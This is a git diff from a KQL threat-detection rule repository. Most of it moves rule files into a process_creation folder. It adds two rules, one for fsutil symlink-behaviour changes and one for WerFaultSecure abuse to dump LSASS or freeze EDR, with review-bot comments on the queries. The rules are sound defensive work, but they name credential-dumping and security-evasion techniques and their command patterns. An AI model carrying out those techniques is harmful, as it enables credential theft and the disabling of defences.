diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql similarity index 100% rename from KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql diff --git a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql similarity index 100% rename from KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql diff --git a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql 
diff --git a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql diff --git a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql similarity index 100% rename from KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql 
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql
new file mode 100644
index 00000000..d320293e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious NTFS Symlink Behavior Modification
+// Author: frack113, The DFIR Report
+// Date: 2022-03-02
+// Level: medium
+// Description: Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1222.001
+// False Positives:
+// - Legitimate usage, investigate the parent process and context to determine if benign.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "fsutil" and ProcessCommandLine contains "behavior" and ProcessCommandLine contains "set" and ProcessCommandLine contains "SymlinkEvaluation") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "R2L:1" or ProcessCommandLine contains "R2R:1" or ProcessCommandLine contains "L2L:1")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql
rename to KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql
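Review bot: The image filter in the `| where` clause only accepts cmd.exe, powershell.exe and pwsh.exe (by FolderPath or ProcessVersionInfoOriginalFileName), so the rule fires only when the fsutil invocation appears on a shell's own command line; a process-creation event for fsutil.exe itself carrying the same `behavior set SymlinkEvaluation` tokens is not matched. If the upstream Sigma rule restricts to shells deliberately, say so in the header (a one-line `// Note:` explaining the scope); otherwise widen the image disjunction with `or FolderPath endswith "\\fsutil.exe"`. The header also reads `MITRE Tactic: Execution` while the Tags line carries both execution and defense-evasion, so if the generator derives the tactic from the first tag that should be documented in the converter rather than left implicit.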
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql 
diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql similarity index 100% rename from KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql diff --git a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql diff --git a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql 
diff --git a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql diff --git a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql diff --git a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql diff --git a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql b/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql rename to KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql 
diff --git a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql b/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_defender_exclusion.kql rename to KQL/rules/windows/process_creation/powershell_defender_exclusion.kql diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql rename to KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql diff --git a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql b/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql similarity index 100% rename from KQL/rules/Execution/powershell_download_and_execution_cradles.kql rename to KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql diff --git a/KQL/rules/Execution/powershell_download_pattern.kql b/KQL/rules/windows/process_creation/powershell_download_pattern.kql similarity index 100% rename from KQL/rules/Execution/powershell_download_pattern.kql rename to KQL/rules/windows/process_creation/powershell_download_pattern.kql diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql rename to KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql 
diff --git a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql similarity index 100% rename from KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql rename to KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql diff --git a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql similarity index 100% rename from KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql rename to KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql diff --git a/KQL/rules/Credential Access/powershell_get_process_lsass.kql b/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql similarity index 100% rename from KQL/rules/Credential Access/powershell_get_process_lsass.kql rename to KQL/rules/windows/process_creation/powershell_get_process_lsass.kql diff --git a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql b/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql similarity index 100% rename from KQL/rules/Execution/powershell_inline_execution_from_a_file.kql rename to KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql similarity index 100% rename from KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql rename to KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql 
diff --git a/KQL/rules/Credential Access/powershell_sam_copy.kql b/KQL/rules/windows/process_creation/powershell_sam_copy.kql similarity index 100% rename from KQL/rules/Credential Access/powershell_sam_copy.kql rename to KQL/rules/windows/process_creation/powershell_sam_copy.kql diff --git a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql rename to KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql diff --git a/KQL/rules/Execution/powershell_script_run_in_appdata.kql b/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql similarity index 100% rename from KQL/rules/Execution/powershell_script_run_in_appdata.kql rename to KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql diff --git a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql b/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql rename to KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql diff --git a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql b/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql rename to KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql 
diff --git a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql similarity index 100% rename from KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql rename to KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql diff --git a/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql new file mode 100644 index 00000000..e4806476 --- /dev/null +++ b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql 
@@ -0,0 +1,17 @@
+// Title: PPL Tampering Via WerFaultSecure
+// Author: Jason (https://github.com/0xbcf)
+// Date: 2025-09-23
+// Level: high
+// Description: Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus).
+// This technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software.
+// Distinct command line patterns help identify the specific tool:
+// - WSASS usage typically shows: "WSASS.exe WerFaultSecure.exe [PID]" in ParentCommandLine
+// - EDR-Freeze usage typically shows: "EDR-Freeze_[version].exe [PID] [timeout]" in ParentCommandLine
+// Legitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate usage of WerFaultSecure for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql b/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql
similarity index 100%
rename from KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql
rename to KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql
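Review bot: The two bullets in the header describe the WSASS and EDR-Freeze launch patterns in `ParentCommandLine`, which is the Sigma field name; in DeviceProcessEvents the parent's command line is `InitiatingProcessCommandLine`, and the query never surfaces it, so an analyst triaging a hit has to fetch it separately. Keeping the filter as is, appending `| project-reorder Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine` and renaming the field in the two bullets would make the header match the telemetry. The literal `" 268310"` on the last line is a bare magic number with no note on what `/type` value it pins; a header line such as `// The " 268310" token is the /type argument value this rule keys on; revisit if the tooling changes it` would keep the condition maintainable.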
diff --git a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql
similarity index 100%
rename from KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql
rename to KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql
diff --git a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql
rename to KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql
diff --git a/KQL/rules/Defense Evasion/procdump_execution.kql b/KQL/rules/windows/process_creation/procdump_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/procdump_execution.kql
rename to KQL/rules/windows/process_creation/procdump_execution.kql
diff --git a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql
rename to KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql
diff --git a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql b/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql
rename to KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql
diff --git a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql
rename to KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql
diff --git a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql b/KQL/rules/windows/process_creation/process_launched_without_image_name.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/process_launched_without_image_name.kql
rename to KQL/rules/windows/process_creation/process_launched_without_image_name.kql
diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql
rename to KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql
diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
rename to KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql
diff --git a/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql
rename to KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql
diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
rename to KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql
diff --git a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql
diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
rename to KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql
diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql
rename to KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql
diff --git a/KQL/rules/Execution/psexec_execution.kql b/KQL/rules/windows/process_creation/psexec_execution.kql
similarity index 100%
rename from KQL/rules/Execution/psexec_execution.kql
rename to KQL/rules/windows/process_creation/psexec_execution.kql
diff --git a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql
similarity index 100%
rename from KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql
rename to KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql
diff --git a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql
similarity index 100%
rename from KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql
rename to KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql
diff --git a/KQL/rules/Execution/psexec_service_execution.kql b/KQL/rules/windows/process_creation/psexec_service_execution.kql
similarity index 100%
rename from KQL/rules/Execution/psexec_service_execution.kql
rename to KQL/rules/windows/process_creation/psexec_service_execution.kql
diff --git a/KQL/rules/Command and Control/pua_3proxy_execution.kql b/KQL/rules/windows/process_creation/pua_3proxy_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_3proxy_execution.kql
rename to KQL/rules/windows/process_creation/pua_3proxy_execution.kql
